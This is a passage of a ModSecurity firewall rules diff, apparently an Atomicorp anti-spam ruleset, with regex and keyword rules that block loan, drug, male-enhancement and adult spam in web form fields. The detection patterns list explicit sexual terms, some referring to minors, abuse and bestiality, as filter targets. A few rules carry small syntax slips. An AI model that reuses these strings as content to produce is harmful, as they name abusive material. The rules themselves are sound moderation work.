+#SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:cash[ -_.,\"\'\|]?advance|pay[ -_.,\"\'\|]?day[ -_.,\"\'\|]?loan|(?:i|la)-sonneries?[ -_.,\"\'\|]*\.[a-z]{2,})"  #        "phase:2,deny,status:403,t:none,t:lowercase,t:compressWhitespace,id:300009,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Possible Loan Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_GENERIC_SPAM
+############ MALE ENHANCEMENT ##############
+SecRule ARGS "@pm penis male enlarg enhanc natural surgery pill traction pump diet member rod cock dick shaft bigger larger increase"         "id:333906,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+                SecAction "phase:2,id:333738,t:none,pass,nolog,noauditlog,skipAfter:END_MALEENHANCE_SPAM"
+# Rule 300056:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:(?:male|penis)[ -_.,\"\'\|]?(?:en(?:larg|hanc)|natural|pill|surgery|traction|pump)|(?:diet|penis|male)[ -_.,\"\'\|]?(?:pills|en(?:larg|hanc))|(?:en(larg|hanc)).{0,10}(?:male|penis)|pills? x [0-9]+ ?mg|enlarge[ -_.,\"\'\|]?yourself[ -_.,\"\'\|]?now|advanced[ -_.,\"\'\|]?gain[ -_.,\"\'\|]?pro|(?:bigger|larger|increase[ -_.,\"\'\|]?your)[ -_.,\"\'\|]?(?:member|rod|shaft|cock|dick|penis)\b[ -_.,\"\'\|])"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300010,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Male Enhancement Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_MALEENHANCE_SPAM
+############ PHARMACY SPAM ################
+SecRule ARGS|!ARGS:/medical/|!ARGS:/drug/ "@pm  adipex allegra ambien amitriptyline bontril buy canadian carisoprodol celexa cheap cialis didrex diet diethylpropion hormone discount drug steroid effexor ephedra ephedrine ewilla extra fioricet flonase free gluclosamine glucosamine hgh hydrocodone ionamin levitra lexapro lipitor lisinopril lostr lsotr medic meridia mexic neurontin nexium nullnix online order ortho oxycodone paxil penicillin pharm phendimetrazine phentermine pheromone pill pimrim plavix plongs ponagansetpost prednisone prescript prevacid price propecia protonix provigil prozac pseudovent ragazze ritalin seroquel silagra startseek store strattera suboxone synthroid tadalafil tenuate topamax toprol tramadol trazodone tricyclen ultracet ultram valium valtex valtrex abilify premarin viagra impotence lithobid keflex terbinafine lamisil gleevec aztrin azithromycin desyrel oleptro beneficat desirel molipaxin thombran trazorel trialodine trittico mesyrel trazodone lamictal purim salbutamol flovent flonase phentrimine aciphex cimetidine ranitidine omeprazole pantoprazole zantac prilosec citalopram lorazepam vicodin vigrx vig-rx vioxx voltaren vytorin wellbutrin xanax xenical zithromax zocor zoloft zyban zyprexa zyrtec doxycycline alli supplements methylphenidate prescription augmentin amoxil outlet dapoxetine"         "id:333907,rev:2,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+                SecAction "phase:2,id:333739,t:none,pass,nolog,noauditlog,skipAfter:END_PHARM_SPAM"
+
+# Rule 300040:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/email/!ARGS:Mensaje|!ARGS:/product/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/medical/|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/medication/|!ARGS:/ajax/ "(?:(?:nullnix|plongs|pimrim|ewilla|startseek|ponagansetpost|prozac|zoloft|xanax|valium|hydrocodone|vicodin|paxil!l|vioxx|celexa|valtrex|zyrtec| hgh |!(t)ambien |carisoprodol|dapoxetine|flonase|allegra|didrex|bontril|nexium)+[ -_.,\"\'\|].{1,100} -_.,\"\'\|](?:l(?:so|os)tr)|ragazze-? ?|(?:prices|pills|buy|diet.{1,100}medic(?:ine|ation|al)|drug).{1,10}pharma|[ -_.,\"\'\|]meridia[ -_.,\"\'\|]|(?:wellbutrin|tenuate|tramadol|pheromones|phendimetrazine|ionamin|ultram |ortho.?tricyclen)+[ -_.,\"\'\|])\.[a-z]{2,}"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300040,rev:10,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Pharmacy',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300057:
+# stacked spam rule - levitra-levitra-levitra or leviTrA retila_prosac etc.
+SecRule ARGS|!ARGS:/page_content/|!ARGS:file|!ARGS:Mensaje|!ARGS:/product/|!ARGS:/medical/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/medication/|!ARGS:/ajax/|!ARGS:/email/ "[-_ ]?\b(?:adipex|suboxone|pseudovent|topamax|trazodone|prevacid|zyrtec|xenical|toprol|zoloft|synthroid|valtrex|wellbutrin|valium|protonix|vytorin|ritalin|zocor|seroquel|ultracet|plavix|voltaren|zyprexa|xanax|vicodin|penicillin|tramadol|provigil|prednisone|vioxx|zithromax|strattera|ultram!(a)|prozac|abilify|terbinafine|premarin|viagra|male impotence|lithobid\b|keflex\b|amoxil\b|augmentin\b|lamisil|gleevec|aztrin|azithromycin|desyrel|oleptro|beneficat|desirel|molipaxin|thombran|trazorel|trialodine|trittico|mesyrel|trazodone|methylphenidate|sertraline|lamictal|purim|salbutamol|flovent|dapoxetine|flonase|phentrimine|aciphex|cimetidine|pantoprazole|omeprazole|ranitidine|zantac|prilosec|citalopram|lorazepam|doxycycline|propecia|natural[-_ ]?hormone[-_ ]?replacement|levitra|phentermine|cialis\b |fioricet|ephedra|ambien\b|carisoprodol)\b[-_ ]?"         "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300061,rev:25,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam or Restricted content: Pharmacy and/or Drug content detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300011:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/medical/|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:(?:online|canadian|mexic(?:an|o))[ -_.,\"\'\|]?(?:pharmacy|drug[ -_.,\"\'\|]?store|medication)|(?:cheap(?:est)?|free)[ -_.,\"\'\|]?(?:pill|drug|steroid)s|order(?:ing)?[ -_.,\"\'\|]?(?:drug|pill|steroid)s[ -_.,\"\'\|]?online|extra [0-9][0-9]\% (?:pill|drug|steroid)|[ -_.,\"\'\|]?discounted[ -_.,\"\'\|]?(?:prescriptions?|drug|steroid)|no[ -_.,\"\'\|]?(?:prior)?[ -_.,\"\'\|]?prescription[ -_.,\"\'\|]?needed|online[ -_.,\"\'\|]?phentermine|phentermine[ -_.,\"\'\|].{1,100}online|online[ -_.,\"\'\|](?:prescription|pharmacy|drug[ -_.,\"\'\|]?store)[ -_.,\"\'\|]|muscle supplements and free stuff|free supplements|purchase[ -_.,\"\'\|]?[a-z]+[ -_.,\"\'\|]?prescription[ -_.,\"\'\|]?on[ -_.,\"\'\|]?line|buy[ -_.,\"\'\|]?generic[ -_.,\"\'\|]?[a-z0-9]+[ -_.,\"\'\|]?online)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300011,rev:12,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Pharmacy',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300038:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/!ARGS:/page_content/|!ARGS:/medical/ "\b(?:silagra|ritalin|levitra|carisoprodol|oxycodone|phentermine|amitriptyline|diethylpropion|abilify|terbinafine|premarin|viagra|male impotence|lithobid\b|keflex\b|lamisil|desyrel|oleptro|beneficat|desirel|molipaxin|thombran|trazorel|trialodine|dapoxetine|trittico|mesyrel|trazodone|aztrin|azithromycin|lamictal|purim|salbutamol|flovent|flonase|phentrimine|aciphex|cimetidine|pantoprazole|cimetidine|protonix|ranitidine|zantac|prilosec|citalopram|omeprazole|lorazepam|doxycycline|lisinopril|vig-?rx|zyban|valtex|xenical|adipex|tadalafil|ephedrine|neurontin|glucosamine|cialis\b |lipitor|effexor|propecia|celebrex|gluclosamine|lexapro|ephedra|levitra| alli weight)[ \-_.,<>\|\"\']"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300038,rev:12,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Pharmacy',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_PHARM_SPAM
+########## ADULT SPAM#################
+SecRule ARGS "@pm 9sekund abuse adult alicia amateur anal animal anime apparatus asia ass assauly audition bang barn bdsm beast bestial big blow bondage boob boy brother bukakke bung butt buy bynes c0ck cam camel celeb chat cheat cheer child club cock comic costume counch cuck cuff cum cunt d1ck dad dailyorbit daughter dick dildo dirty dog doll door dress ebony exotic face femdom femsub fetish filth fist fresh fuck furniture gang gay giant girl golden grann hairy hand hannigan hardcore homo horny horse hot hub hudgens hunter huojia husband hyke incent incest japanese jinxinghj kink l1ck large latex lesbian lick leashed little live lolita love maledom malesub man manga mature member men milf mom mouth movie naked natural niece nude nudity nurse pair paris penis photo pic pig plug pony petgirl porn pussies pussy queen rod russian scat scene schoolgirl schoolboy seduce sex s-e-x shabby shaft shag shaved shemale shower silver sister slave sleep slut small son spank spy still story strapon strip submissive suck sultry swap swinger talk tape tease teen tied top torture tounge toy trailer tran tube twink uncle under vagina vibrat vid virgin voyeur whip wife wive woman women xxx young zone zoo orgasm rape illegal date ptch model pantyhose pantyhouse hentai cuckold"         "id:353908,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+                SecAction "phase:2,id:333740,t:none,pass,nolog,noauditlog,skipAfter:END_ADULT_SPAM"
+
+# Rule 300065:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:[ -_.,\"\'\|]+brutal[ -_.,\"\'\|]+dild(?:oes|o|os)[ -_.,\"\'\|]|[ -_.,\"\'\|]cum[ -_.,\"\'\|]shots?[ -_.,\"\'\|]|(?:hairy|shaved|leashed|under[ -_.,\"\'\|]?age|lolitas?|teens?) (?:[a-z]+ puss(?:y|ies)|puss(?:y|ies))|[ -_.,\"\'\|]+(?:naked|porn|adult|school(?:girl|boy)|(?:gay|anal) sex)[ -_.,\"\'\|]+movies?[ -_.,\"\'\|]|[ -_.,\"\'\|](?:hudgens|free)[ -_.,\"\'\|]+naked[ -_.,\"\'\|]|9sekund|find-it-buy-it|bukakke|(?:incest|amat(?:eur|ure)|horny|bondage|bestiall?ity|slave|submissive|femdom|maledom|femsub|malesub|gay|lesbian|bi(?:-| )?sexual|lolitas?|shemales?|(?:g|t)rann(?:ys?|ies)|swingers?|milfs?|(?:hot|slut)[ -_.,\"\'\|]?wi(?:v|f)es?|under[ -_.,\"\'\|]?age|sex[ -_.,\"\'\|]?doll|fisting|child|lolitas?|preteens?)[ -_.,\"\'\|]?\b(?:boys|sex|porn|video|mpe?g|avi|wmv|fuck|shag|xxx)\b|teen[ -_.,\"\'\|]?(?:lesbian|gay|girls?|boys?)[ -_.,\"\'\|]?orgasm|porno?[ -_.,\"\'\|]?(?:film|video)|video porno|girls[ -_.,\"\'\|]?in[ -_.,\"\'\|]?pantyhou?se|school(?:boy|girl)[ -_.,\"\'\|]cumshot|sexx?y teen model|teen model sexx?y|/wporn/w gay)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300065,rev:11,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult Content Detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300068:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:silver[ -_.,\"\'\|]foxes|sex[ -_.,\"\'\|]?toys?[ -_.,\"\'\|]?(?:for[ -_.,\"\'\|]?sale|online|store)|free[ -_.,\"\'\|]?adult|sex-position|fake[ -_.,\"\'\|]?vagina|lovehoney ?sex|adult[ -_.,\"\'\|]?(?:shop|store)|anal[ -_.,\"\'\|]?(?:sex)?[ -_.,\"\'\|]?toy|dildos|strapon|butt[ -_.,\"\'\|]?plug|vibrators|official[ -_.,\"\'\|]?pornstar|[ -_.,\"\'\|]inch(?:es)? .{0,10}(?:cock|dick)\b|(?:bdsm|bondage)[ -_.,\"\'\|]?apparatus|(?:sex|fuck|shag|bondage|bdsm)[ -_.,\"\'\|]?(?:furniture|couch)|[ -_.,\"\'\|](?:suck|l[i1]ck).{1,30}(?:c[o0]ck|d[i1]ck|pussy)[ -_.,\"\'\|]|sultryserver|cock[ -_.,\"\'\|]?ring !(nano )|group[ -_.,\"\'\|]?sex|(?:nude|naked|xxx)[ -_.,\"\'\|]?(?:celebs|cheerleaders|girls|boys|teens|nymph)|(?:illegal|rape|fetish|latex|slave|bdsm|leashed|bondage|bestiall?ita?y|farm)[ -_.,\"\'\|]?(?:porn|xxx)|(?:pony|pet)[ -_.,\"\'\|]?(?:girl|boy)|date[ -_.,\"\'\|]?rape[ -_.,\"\'\|]?drug[ -_.,\"\'\|]?video)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300068,rev:9,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Adult Content Detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300057: Comment Spam
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:amember_pass|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:(?:back[ -_.,\"\'\|]?seat[ -_.,\"\'\|]?bangers?|gang[ -_.,\"\'\|]?bang(?:ed|ing)?)[ -_.,\"\'\|]|(?:fuck|shag)[ -_.,\"\'\|]?giant[ -_.,\"\'\|]?cock\b|(?:mouth|face)[ -_.,\"\'\|]?(?:fuck|shag)|(?:huge|massive|monster)[ -_.,\"\'\|]?(?:cock|dick|strapon)\b[ -_.,\"\'\|]?(?:small|tiny|little)[ -_.,\"\'\|]?(?:wom(?:a|e)n|girl|boy|twink)|girls[ -_.,\"\'\|]?next[ -_.,\"\'\|]?door[ -_.,\"\'\|]?on[ -_.,\"\'\|]?e|(?:top|biggest|hottest|sexiest|teen)[ -_.,\"\'\|]?porn[ -_.,\"\'\|]?stars|(?:hannigan|nymphets?|bynes|alicia[ -_.,\"\'\|]silverstone)[ -_.,\"\'\|]?(?:nude|nudi(?:es|ty)|american[ -_.,\"\'\|]pie)[ -_.,\"\'\|]|(?:blow[ -_.,\"\'\|]?(?:jobs?)[ -_.,\"\'\|]|jennas[ -_.,\"\'\|]?myspace | i kissed a girl|(?:mature|teen|au ?pair)[ -_.,\"\'\|]?(?:sex|porn|xxx|club)[ -_.,\"\'\|]?(?:sex|club|porn|xxx)))"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300057,rev:8,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300003: Comment Spam
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:(?:g(?:a|u)y|homosexual|bi-?sex(?:ual)?|shemales?|lolitas?|manga|virgins?|teens?|porno?)[ -_.,\"\'\|](?:beastiality|bestiallity|sex[ -_.,\"\'\|]scenes?|video|slut|trailer|(?:boy|girl)[ -_.,\"\'\|](?:pic|video)s?|(?:fuck|shag)ing)|(?:naked|vivid|xxx)[ -_.,\"\'\|](?:boys|girls|child[ -_.,\"\'\|]sex)|anime[ -_.,\"\'\|]boobs?|shabby[ -_.,\"\'\|]virgins?|(?:cunt|pussy|vagina|cock|trann?(?:y|ie)s?|shemales?)[ -_.,\"\'\|]?abuse|cock[ -_.,\"\'\|]?(?:and)?[ -_.,\"\'\|]?ball[ -_.,\"\'\|]?torture|sleep[ -_.,\"\'\|]?assault|my[ -_.,\"\'\|]?gay[ -_.,\"\'\|]?(?:tale|story|porn)|camel[ -_.,\"\'\|]?toe[ -_.,\"\'\|]?auditions?|teen[ -_.,\"\'\|]?anal[ -_.,\"\'\|]?queen|[ -_.,\"\'\|]ebony[ -_.,\"\'\|]porn)[ -_.,\"\'\|]"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300003,rev:12,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult Video',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300004: Comment Spam
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:(?:beastilality|bestiallity)[ -_.,\"\'\|]?stor(?:y|ies)|bounce[ -_.,\"\'\|]?your[ -_.,\"\'\|]?boob|\bshow[ -_.,\"\'\|]?your[ -_.,\"\'\|]?(?:pussy|cunt|cock)\b|dailyorbit|i-horny|filthserver|milf[ -_.,\"\'\|].{1,100}(?:hunter|cruiser|mom)|(?:fuck|shag|anal)(ing)? lessons?|mikes?[ -_.,\"\'\|]apartment|sexy[ -_.,\"\'\|](?:moms|lingerie|teens?)|(?:horse|animal|dog|farm)[ -_.,\"\'\|].{1,100}\b(?:porn|cocks?|dicks?|sex|penis|blowjob)\b[ -_.,\"\'\|]?|free[ -_.,\"\'\|]?(?:sex|beastiality|bestiallity|extreme|(gay|(?:bi|tran)sex(ual)?)? ?porn|xxx|adult|bondage|bdsm|femdom|sex|femsub|maledom|malesub|fuck|shag)[ -_.,\"\'\|]|(?:sex|beastiality|bestiallity|porn(o|s)?|xxx|adult|bondage|bdsm|femdom|femsub|maledom|malesub|fuck|shag)[ -_.,\"\'\|]?free|camfun24|(?:fresh|dirty)[ -_.,\"\'\|]?(?:girls|comics|boys|teens)|dirty[ -_.,\"\'\|]sex[ -_.,\"\'\|]comic|top model links|teenmodel club)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300004,rev:7,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 30074
+SecRule ARGS|!ARGS:/saml/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail|!ARGS:/ajax/ "(?:s-e-x|zoo(?:ph|f)ilia|giant cock\b|porn(?:hub|tube)|sexyongpin|(?:wi(?:f|v)es?|slaves?|strippers?|whores?|prostitutes?|under[ 